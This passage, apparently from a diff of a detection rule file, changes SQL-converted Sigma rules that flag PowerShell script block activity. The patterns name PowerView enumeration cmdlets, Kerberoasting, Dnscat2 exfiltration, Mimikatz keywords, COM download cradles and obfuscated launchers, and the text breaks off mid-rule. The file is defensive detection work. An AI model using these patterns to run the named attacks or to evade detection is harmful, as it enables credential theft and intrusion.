ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_get_childitem_bookmarks.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6454,9 +6025,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { "title": "Troubleshooting Pack Cmdlet Execution", @@ -6478,77 +6049,81 @@ "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "status": "test", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "author": "frack113", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_download_com_cradles.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { "title": "WMIC Unquoted Services Path Lookup - PowerShell", @@ -6570,661 +6145,630 @@ "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Powershell File and Directory Discovery", - "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "status": "test", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_file_and_directory_discovery.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "id": "88f0884b-331d-403d-a3a1-b668cf035603", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_susp_ad_group_reco.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious GPO Discovery With Get-GPO", - "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "status": "experimental", - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "title": "Suspicious Connection to Remote Account", + "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "status": "test", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_gpo.yml" + "filename": "posh_ps_susp_networkcredential.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "status": "test", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1070.003" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.defense_evasion" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "id": "88f0884b-331d-403d-a3a1-b668cf035603", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' 